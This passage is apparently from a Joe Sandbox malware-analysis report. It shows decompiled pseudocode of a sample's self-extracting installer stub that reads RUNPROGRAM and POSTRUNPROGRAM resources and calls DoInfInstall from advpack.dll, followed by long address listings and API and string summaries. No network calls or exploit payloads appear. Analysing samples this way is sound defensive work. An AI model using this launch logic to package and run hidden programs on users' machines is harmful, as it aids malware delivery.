                                                                                                                                                                                                                                      										_v304 = 1;
                                                                                                                                                                                                                                      										_v300 = _t137;
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      									goto L14;
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      								_push(6);
                                                                                                                                                                                                                                      								_v304 = 1;
                                                                                                                                                                                                                                      								_pop(0);
                                                                                                                                                                                                                                      								goto L11;
                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                      								_v304 = 1;
                                                                                                                                                                                                                                      								L11:
                                                                                                                                                                                                                                      								_v300 = 0;
                                                                                                                                                                                                                                      								L14:
                                                                                                                                                                                                                                      								if(_t127 != 0) {
                                                                                                                                                                                                                                      									L27:
                                                                                                                                                                                                                                      									_t155 = 1;
                                                                                                                                                                                                                                      									__eflags = _t127 - 1;
                                                                                                                                                                                                                                      									if(_t127 != 1) {
                                                                                                                                                                                                                                      										L31:
                                                                                                                                                                                                                                      										_t132 =  &_v280;
                                                                                                                                                                                                                                      										_t76 = E00401B04( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                                                      										__eflags = _t76;
                                                                                                                                                                                                                                      										if(_t76 == 0) {
                                                                                                                                                                                                                                      											L62:
                                                                                                                                                                                                                                      											_t77 = 0;
                                                                                                                                                                                                                                      											L63:
                                                                                                                                                                                                                                      											_pop(_t150);
                                                                                                                                                                                                                                      											_pop(_t156);
                                                                                                                                                                                                                                      											_pop(_t128);
                                                                                                                                                                                                                                      											return E00406C80(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                      										_t157 = _v404;
                                                                                                                                                                                                                                      										__eflags = _t149;
                                                                                                                                                                                                                                      										if(_t149 != 0) {
                                                                                                                                                                                                                                      											L37:
                                                                                                                                                                                                                                      											__eflags = _t157;
                                                                                                                                                                                                                                      											if(_t157 == 0) {
                                                                                                                                                                                                                                      												L57:
                                                                                                                                                                                                                                      												_t151 = _v408;
                                                                                                                                                                                                                                      												_t146 =  &_v352;
                                                                                                                                                                                                                                      												_t130 = _t151; // executed
                                                                                                                                                                                                                                      												_t79 = E00403FDB(_t130,  &_v352); // executed
                                                                                                                                                                                                                                      												__eflags = _t79;
                                                                                                                                                                                                                                      												if(_t79 == 0) {
                                                                                                                                                                                                                                      													L61:
                                                                                                                                                                                                                                      													LocalFree(_t151);
                                                                                                                                                                                                                                      													goto L62;
                                                                                                                                                                                                                                      												}
                                                                                                                                                                                                                                      												L58:
                                                                                                                                                                                                                                      												LocalFree(_t151);
                                                                                                                                                                                                                                      												_t127 = _t127 + 1;
                                                                                                                                                                                                                                      												_v396 = _t127;
                                                                                                                                                                                                                                      												__eflags = _t127 - 2;
                                                                                                                                                                                                                                      												if(_t127 >= 2) {
                                                                                                                                                                                                                                      													_t155 = 1;
                                                                                                                                                                                                                                      													__eflags = 1;
                                                                                                                                                                                                                                      													L69:
                                                                                                                                                                                                                                      													__eflags =  *0x408580;
                                                                                                                                                                                                                                      													if( *0x408580 != 0) {
                                                                                                                                                                                                                                      														E0040226E();
                                                                                                                                                                                                                                      													}
                                                                                                                                                                                                                                      													_t77 = _t155;
                                                                                                                                                                                                                                      													goto L63;
                                                                                                                                                                                                                                      												}
                                                                                                                                                                                                                                      												_t153 = _v392;
                                                                                                                                                                                                                                      												_t149 = _v388;
                                                                                                                                                                                                                                      												continue;
                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                      											L38:
                                                                                                                                                                                                                                      											__eflags =  *0x408180;
                                                                                                                                                                                                                                      											if( *0x408180 == 0) {
                                                                                                                                                                                                                                      												_t146 = 0x4c7;
                                                                                                                                                                                                                                      												E00404495(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                      												LocalFree(_v424);
                                                                                                                                                                                                                                      												 *0x409124 = 0x8007042b;
                                                                                                                                                                                                                                      												goto L62;
                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                      											__eflags = _t157;
                                                                                                                                                                                                                                      											if(_t157 == 0) {
                                                                                                                                                                                                                                      												goto L57;
                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                      											__eflags =  *0x409a34 & 0x00000004;
                                                                                                                                                                                                                                      											if(__eflags == 0) {
                                                                                                                                                                                                                                      												goto L57;
                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                      											_t129 = E00406443(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                                                      											__eflags = _t129;
                                                                                                                                                                                                                                      											if(_t129 == 0) {
                                                                                                                                                                                                                                      												_t146 = 0x4c8;
                                                                                                                                                                                                                                      												E00404495(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                                                      												L65:
                                                                                                                                                                                                                                      												LocalFree(_v408);
                                                                                                                                                                                                                                      												 *0x409124 = E00406233();
                                                                                                                                                                                                                                      												goto L62;
                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                      											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                                                      											_v404 = _t146;
                                                                                                                                                                                                                                      											__eflags = _t146;
                                                                                                                                                                                                                                      											if(_t146 == 0) {
                                                                                                                                                                                                                                      												_t146 = 0x4c9;
                                                                                                                                                                                                                                      												__eflags = 0;
                                                                                                                                                                                                                                      												E00404495(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                                                      												FreeLibrary(_t129);
                                                                                                                                                                                                                                      												goto L65;
                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                      											__eflags =  *0x408a30;
                                                                                                                                                                                                                                      											_t151 = _v408;
                                                                                                                                                                                                                                      											_v384 = 0;
                                                                                                                                                                                                                                      											_v368 =  &_v280;
                                                                                                                                                                                                                                      											_t96 =  *0x409a40; // 0x3
                                                                                                                                                                                                                                      											_v364 = _t96;
                                                                                                                                                                                                                                      											_t97 =  *0x408a38 & 0x0000ffff;
                                                                                                                                                                                                                                      											_v380 = 0x409154;
                                                                                                                                                                                                                                      											_v376 = _t151;
                                                                                                                                                                                                                                      											_v372 = 0x4091e4;
                                                                                                                                                                                                                                      											_v360 = _t97;
                                                                                                                                                                                                                                      											if( *0x408a30 != 0) {
                                                                                                                                                                                                                                      												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                                                      												__eflags = _t97;
                                                                                                                                                                                                                                      												_v360 = _t97;
                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                      											_t144 =  *0x409a34; // 0x2
                                                                                                                                                                                                                                      											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                                                      											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                                                      												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                                                      												__eflags = _t97;
                                                                                                                                                                                                                                      												_v360 = _t97;
                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                      											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                                                      											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                                                      												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                                                      												__eflags = _t97;
                                                                                                                                                                                                                                      												_v360 = _t97;
                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                      											_t145 =  *0x408d48; // 0x0
                                                                                                                                                                                                                                      											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                                                      											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                                                      												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                                                      												__eflags = _t97;
                                                                                                                                                                                                                                      												_v360 = _t97;
                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                      											__eflags = _t145;
                                                                                                                                                                                                                                      											if(_t145 < 0) {
                                                                                                                                                                                                                                      												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                                                      												__eflags = _t104;
                                                                                                                                                                                                                                      												_v360 = _t104;
                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                      											_t98 =  *0x409a38; // 0x0
                                                                                                                                                                                                                                      											_v356 = _t98;
                                                                                                                                                                                                                                      											_t130 = _t146;
                                                                                                                                                                                                                                      											 *0x40a288( &_v384);
                                                                                                                                                                                                                                      											_t101 = _v404();
                                                                                                                                                                                                                                      											__eflags = _t164 - _t164;
                                                                                                                                                                                                                                      											if(_t164 != _t164) {
                                                                                                                                                                                                                                      												_t130 = 4;
                                                                                                                                                                                                                                      												asm("int 0x29");
                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                      											 *0x409124 = _t101;
                                                                                                                                                                                                                                      											_push(_t129);
                                                                                                                                                                                                                                      											__eflags = _t101;
                                                                                                                                                                                                                                      											if(_t101 < 0) {
                                                                                                                                                                                                                                      												FreeLibrary();
                                                                                                                                                                                                                                      												goto L61;
                                                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                                                      												FreeLibrary();
                                                                                                                                                                                                                                      												_t127 = _v400;
                                                                                                                                                                                                                                      												goto L58;
                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                      										__eflags =  *0x409a40 - 1; // 0x3
                                                                                                                                                                                                                                      										if(__eflags == 0) {
                                                                                                                                                                                                                                      											goto L37;
                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                      										__eflags =  *0x408a20;
                                                                                                                                                                                                                                      										if( *0x408a20 == 0) {
                                                                                                                                                                                                                                      											goto L37;
                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                      										__eflags = _t157;
                                                                                                                                                                                                                                      										if(_t157 != 0) {
                                                                                                                                                                                                                                      											goto L38;
                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                      										_v388 = 1;
                                                                                                                                                                                                                                      										E00402033(_t146); // executed
                                                                                                                                                                                                                                      										goto L37;
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      									_t146 =  &_v280;
                                                                                                                                                                                                                                      									_t108 = E00404669("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                                                      									__eflags = _t108;
                                                                                                                                                                                                                                      									if(_t108 == 0) {
                                                                                                                                                                                                                                      										goto L25;
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      									__eflags =  *0x408c42;
                                                                                                                                                                                                                                      									if( *0x408c42 != 0) {
                                                                                                                                                                                                                                      										goto L69;
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                                                      									__eflags = _t112 == 0;
                                                                                                                                                                                                                                      									if(_t112 == 0) {
                                                                                                                                                                                                                                      										goto L69;
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      									goto L31;
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      								_t118 =  *0x408a38; // 0x0
                                                                                                                                                                                                                                      								if(_t118 == 0) {
                                                                                                                                                                                                                                      									L23:
                                                                                                                                                                                                                                      									if(_t153 != 0) {
                                                                                                                                                                                                                                      										goto L31;
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      									_t146 =  &_v276;
                                                                                                                                                                                                                                      									if(E00404669("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                                                      										goto L27;
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      									goto L25;
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                                                      									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                                                      									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                                                      										goto L62;
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      									_t140 = "USRQCMD";
                                                                                                                                                                                                                                      									L20:
                                                                                                                                                                                                                                      									_t146 =  &_v276;
                                                                                                                                                                                                                                      									if(E00404669(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                                                      										goto L25;
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                                                      										_t153 = 1;
                                                                                                                                                                                                                                      										_v388 = 1;
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      									goto L23;
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      								_t140 = "ADMQCMD";
                                                                                                                                                                                                                                      								goto L20;
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						L26:
                                                                                                                                                                                                                                      						_push(_t130);
                                                                                                                                                                                                                                      						_t146 = 0x104;
                                                                                                                                                                                                                                      						E004017A1( &_v276, 0x104, _t130, 0x408c42);
                                                                                                                                                                                                                                      						goto L27;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_t130 = "REBOOT";
                                                                                                                                                                                                                                      				_t125 = E00404669(_t130, 0x409a2c, 4);
                                                                                                                                                                                                                                      				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                                                      					goto L25;
                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                      					goto L3;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      			}





























































                                                                                                                                                                                                                                      0x00403b96
                                                                                                                                                                                                                                      0x00403b9c
                                                                                                                                                                                                                                      0x00403ba3
                                                                                                                                                                                                                                      0x00403bac
                                                                                                                                                                                                                                      0x00403bae
                                                                                                                                                                                                                                      0x00403bb5
                                                                                                                                                                                                                                      0x00403bb7
                                                                                                                                                                                                                                      0x00403bbb
                                                                                                                                                                                                                                      0x00403bbf
                                                                                                                                                                                                                                      0x00403bc5
                                                                                                                                                                                                                                      0x00403be9
                                                                                                                                                                                                                                      0x00403be9
                                                                                                                                                                                                                                      0x00403beb
                                                                                                                                                                                                                                      0x00403bef
                                                                                                                                                                                                                                      0x00403bef
                                                                                                                                                                                                                                      0x00403bfd
                                                                                                                                                                                                                                      0x00403c02
                                                                                                                                                                                                                                      0x00403c05
                                                                                                                                                                                                                                      0x00403c14
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403c1c
                                                                                                                                                                                                                                      0x00403c25
                                                                                                                                                                                                                                      0x00403c2c
                                                                                                                                                                                                                                      0x00403cff
                                                                                                                                                                                                                                      0x00403d01
                                                                                                                                                                                                                                      0x00403d0d
                                                                                                                                                                                                                                      0x00403d12
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403c3b
                                                                                                                                                                                                                                      0x00403c42
                                                                                                                                                                                                                                      0x00403c4c
                                                                                                                                                                                                                                      0x00403c51
                                                                                                                                                                                                                                      0x00403c63
                                                                                                                                                                                                                                      0x00403c64
                                                                                                                                                                                                                                      0x00403c68
                                                                                                                                                                                                                                      0x00403c6a
                                                                                                                                                                                                                                      0x00403c6e
                                                                                                                                                                                                                                      0x00403c6e
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403c68
                                                                                                                                                                                                                                      0x00403c53
                                                                                                                                                                                                                                      0x00403c55
                                                                                                                                                                                                                                      0x00403c59
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403c44
                                                                                                                                                                                                                                      0x00403c44
                                                                                                                                                                                                                                      0x00403c5a
                                                                                                                                                                                                                                      0x00403c5a
                                                                                                                                                                                                                                      0x00403c73
                                                                                                                                                                                                                                      0x00403c75
                                                                                                                                                                                                                                      0x00403d39
                                                                                                                                                                                                                                      0x00403d3b
                                                                                                                                                                                                                                      0x00403d3c
                                                                                                                                                                                                                                      0x00403d3e
                                                                                                                                                                                                                                      0x00403d8a
                                                                                                                                                                                                                                      0x00403d94
                                                                                                                                                                                                                                      0x00403d9b
                                                                                                                                                                                                                                      0x00403da0
                                                                                                                                                                                                                                      0x00403da2
                                                                                                                                                                                                                                      0x00403f39
                                                                                                                                                                                                                                      0x00403f39
                                                                                                                                                                                                                                      0x00403f3b
                                                                                                                                                                                                                                      0x00403f42
                                                                                                                                                                                                                                      0x00403f43
                                                                                                                                                                                                                                      0x00403f44
                                                                                                                                                                                                                                      0x00403f4f
                                                                                                                                                                                                                                      0x00403f4f
                                                                                                                                                                                                                                      0x00403da8
                                                                                                                                                                                                                                      0x00403dac
                                                                                                                                                                                                                                      0x00403dae
                                                                                                                                                                                                                                      0x00403dd2
                                                                                                                                                                                                                                      0x00403dd2
                                                                                                                                                                                                                                      0x00403dd4
                                                                                                                                                                                                                                      0x00403ef7
                                                                                                                                                                                                                                      0x00403ef7
                                                                                                                                                                                                                                      0x00403efb
                                                                                                                                                                                                                                      0x00403eff
                                                                                                                                                                                                                                      0x00403f01
                                                                                                                                                                                                                                      0x00403f06
                                                                                                                                                                                                                                      0x00403f08
                                                                                                                                                                                                                                      0x00403f32
                                                                                                                                                                                                                                      0x00403f33
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403f33
                                                                                                                                                                                                                                      0x00403f0a
                                                                                                                                                                                                                                      0x00403f0b
                                                                                                                                                                                                                                      0x00403f11
                                                                                                                                                                                                                                      0x00403f12
                                                                                                                                                                                                                                      0x00403f16
                                                                                                                                                                                                                                      0x00403f19
                                                                                                                                                                                                                                      0x00403fc5
                                                                                                                                                                                                                                      0x00403fc5
                                                                                                                                                                                                                                      0x00403fc6
                                                                                                                                                                                                                                      0x00403fc6
                                                                                                                                                                                                                                      0x00403fcd
                                                                                                                                                                                                                                      0x00403fcf
                                                                                                                                                                                                                                      0x00403fcf
                                                                                                                                                                                                                                      0x00403fd4
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403fd4
                                                                                                                                                                                                                                      0x00403f1f
                                                                                                                                                                                                                                      0x00403f23
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403f23
                                                                                                                                                                                                                                      0x00403dda
                                                                                                                                                                                                                                      0x00403dda
                                                                                                                                                                                                                                      0x00403de1
                                                                                                                                                                                                                                      0x00403f99
                                                                                                                                                                                                                                      0x00403fa5
                                                                                                                                                                                                                                      0x00403fae
                                                                                                                                                                                                                                      0x00403fb4
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403fb4
                                                                                                                                                                                                                                      0x00403de7
                                                                                                                                                                                                                                      0x00403de9
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403def
                                                                                                                                                                                                                                      0x00403df6
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403e01
                                                                                                                                                                                                                                      0x00403e03
                                                                                                                                                                                                                                      0x00403e05
                                                                                                                                                                                                                                      0x00403f80
                                                                                                                                                                                                                                      0x00403f90
                                                                                                                                                                                                                                      0x00403f68
                                                                                                                                                                                                                                      0x00403f6c
                                                                                                                                                                                                                                      0x00403f77
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403f77
                                                                                                                                                                                                                                      0x00403e18
                                                                                                                                                                                                                                      0x00403e1c
                                                                                                                                                                                                                                      0x00403e20
                                                                                                                                                                                                                                      0x00403e22
                                                                                                                                                                                                                                      0x00403f55
                                                                                                                                                                                                                                      0x00403f5a
                                                                                                                                                                                                                                      0x00403f5c
                                                                                                                                                                                                                                      0x00403f62
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403f62
                                                                                                                                                                                                                                      0x00403e28
                                                                                                                                                                                                                                      0x00403e2f
                                                                                                                                                                                                                                      0x00403e33
                                                                                                                                                                                                                                      0x00403e3e
                                                                                                                                                                                                                                      0x00403e42
                                                                                                                                                                                                                                      0x00403e48
                                                                                                                                                                                                                                      0x00403e4d
                                                                                                                                                                                                                                      0x00403e54
                                                                                                                                                                                                                                      0x00403e5c
                                                                                                                                                                                                                                      0x00403e60
                                                                                                                                                                                                                                      0x00403e68
                                                                                                                                                                                                                                      0x00403e6c
                                                                                                                                                                                                                                      0x00403e6e
                                                                                                                                                                                                                                      0x00403e6e
                                                                                                                                                                                                                                      0x00403e73
                                                                                                                                                                                                                                      0x00403e73
                                                                                                                                                                                                                                      0x00403e77
                                                                                                                                                                                                                                      0x00403e7d
                                                                                                                                                                                                                                      0x00403e80
                                                                                                                                                                                                                                      0x00403e82
                                                                                                                                                                                                                                      0x00403e82
                                                                                                                                                                                                                                      0x00403e87
                                                                                                                                                                                                                                      0x00403e87
                                                                                                                                                                                                                                      0x00403e8b
                                                                                                                                                                                                                                      0x00403e8e
                                                                                                                                                                                                                                      0x00403e90
                                                                                                                                                                                                                                      0x00403e90
                                                                                                                                                                                                                                      0x00403e95
                                                                                                                                                                                                                                      0x00403e95
                                                                                                                                                                                                                                      0x00403e99
                                                                                                                                                                                                                                      0x00403e9f
                                                                                                                                                                                                                                      0x00403ea2
                                                                                                                                                                                                                                      0x00403ea4
                                                                                                                                                                                                                                      0x00403ea4
                                                                                                                                                                                                                                      0x00403ea9
                                                                                                                                                                                                                                      0x00403ea9
                                                                                                                                                                                                                                      0x00403ead
                                                                                                                                                                                                                                      0x00403eaf
                                                                                                                                                                                                                                      0x00403eb1
                                                                                                                                                                                                                                      0x00403eb1
                                                                                                                                                                                                                                      0x00403eb6
                                                                                                                                                                                                                                      0x00403eb6
                                                                                                                                                                                                                                      0x00403eba
                                                                                                                                                                                                                                      0x00403ec1
                                                                                                                                                                                                                                      0x00403ec5
                                                                                                                                                                                                                                      0x00403ecc
                                                                                                                                                                                                                                      0x00403ed2
                                                                                                                                                                                                                                      0x00403ed6
                                                                                                                                                                                                                                      0x00403ed8
                                                                                                                                                                                                                                      0x00403eda
                                                                                                                                                                                                                                      0x00403edf
                                                                                                                                                                                                                                      0x00403edf
                                                                                                                                                                                                                                      0x00403ee1
                                                                                                                                                                                                                                      0x00403ee6
                                                                                                                                                                                                                                      0x00403ee7
                                                                                                                                                                                                                                      0x00403ee9
                                                                                                                                                                                                                                      0x00403f2c
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403eeb
                                                                                                                                                                                                                                      0x00403eeb
                                                                                                                                                                                                                                      0x00403ef1
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403ef1
                                                                                                                                                                                                                                      0x00403ee9
                                                                                                                                                                                                                                      0x00403db3
                                                                                                                                                                                                                                      0x00403dba
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403dbc
                                                                                                                                                                                                                                      0x00403dc3
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403dc5
                                                                                                                                                                                                                                      0x00403dc7
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403dc9
                                                                                                                                                                                                                                      0x00403dcd
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403dcd
                                                                                                                                                                                                                                      0x00403d45
                                                                                                                                                                                                                                      0x00403d51
                                                                                                                                                                                                                                      0x00403d56
                                                                                                                                                                                                                                      0x00403d58
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403d5a
                                                                                                                                                                                                                                      0x00403d61
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403d7b
                                                                                                                                                                                                                                      0x00403d82
                                                                                                                                                                                                                                      0x00403d84
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403d84
                                                                                                                                                                                                                                      0x00403c7b
                                                                                                                                                                                                                                      0x00403c84
                                                                                                                                                                                                                                      0x00403cdd
                                                                                                                                                                                                                                      0x00403cdf
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403cea
                                                                                                                                                                                                                                      0x00403cfd
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403cfd
                                                                                                                                                                                                                                      0x00403c88
                                                                                                                                                                                                                                      0x00403c91
                                                                                                                                                                                                                                      0x00403c93
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403c99
                                                                                                                                                                                                                                      0x00403c9e
                                                                                                                                                                                                                                      0x00403ca3
                                                                                                                                                                                                                                      0x00403cb1
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403cd4
                                                                                                                                                                                                                                      0x00403cd8
                                                                                                                                                                                                                                      0x00403cd9
                                                                                                                                                                                                                                      0x00403cd9
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403cd4
                                                                                                                                                                                                                                      0x00403c8a
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403c8a
                                                                                                                                                                                                                                      0x00403c42
                                                                                                                                                                                                                                      0x00403d21
                                                                                                                                                                                                                                      0x00403d21
                                                                                                                                                                                                                                      0x00403d28
                                                                                                                                                                                                                                      0x00403d34
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403d34
                                                                                                                                                                                                                                      0x00403bef
                                                                                                                                                                                                                                      0x00403bce
                                                                                                                                                                                                                                      0x00403bd3
                                                                                                                                                                                                                                      0x00403bda
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403BFD
                                                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00403CC8
                                                                                                                                                                                                                                        • Part of subcall function 00404669: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 0040467A
                                                                                                                                                                                                                                        • Part of subcall function 00404669: SizeofResource.KERNEL32(00000000,00000000,?,00402D11,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00404683
                                                                                                                                                                                                                                        • Part of subcall function 00404669: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 0040469D
                                                                                                                                                                                                                                        • Part of subcall function 00404669: LoadResource.KERNEL32(00000000,00000000,?,00402D11,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A6
                                                                                                                                                                                                                                        • Part of subcall function 00404669: LockResource.KERNEL32(00000000,?,00402D11,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046AD
                                                                                                                                                                                                                                        • Part of subcall function 00404669: memcpy_s.MSVCRT ref: 004046BF
                                                                                                                                                                                                                                        • Part of subcall function 00404669: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046C9
                                                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00408C42), ref: 00403D7B
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00403E12
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00408C42), ref: 00403EEB
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,00408C42), ref: 00403F0B
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00408C42), ref: 00403F2C
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,00408C42), ref: 00403F33
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00408C42), ref: 00403F62
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00408C42), ref: 00403F6C
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00408C42), ref: 00403FAE
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                                                      • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$OxZQ$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll
                                                                                                                                                                                                                                      • API String ID: 1032054927-3344761218
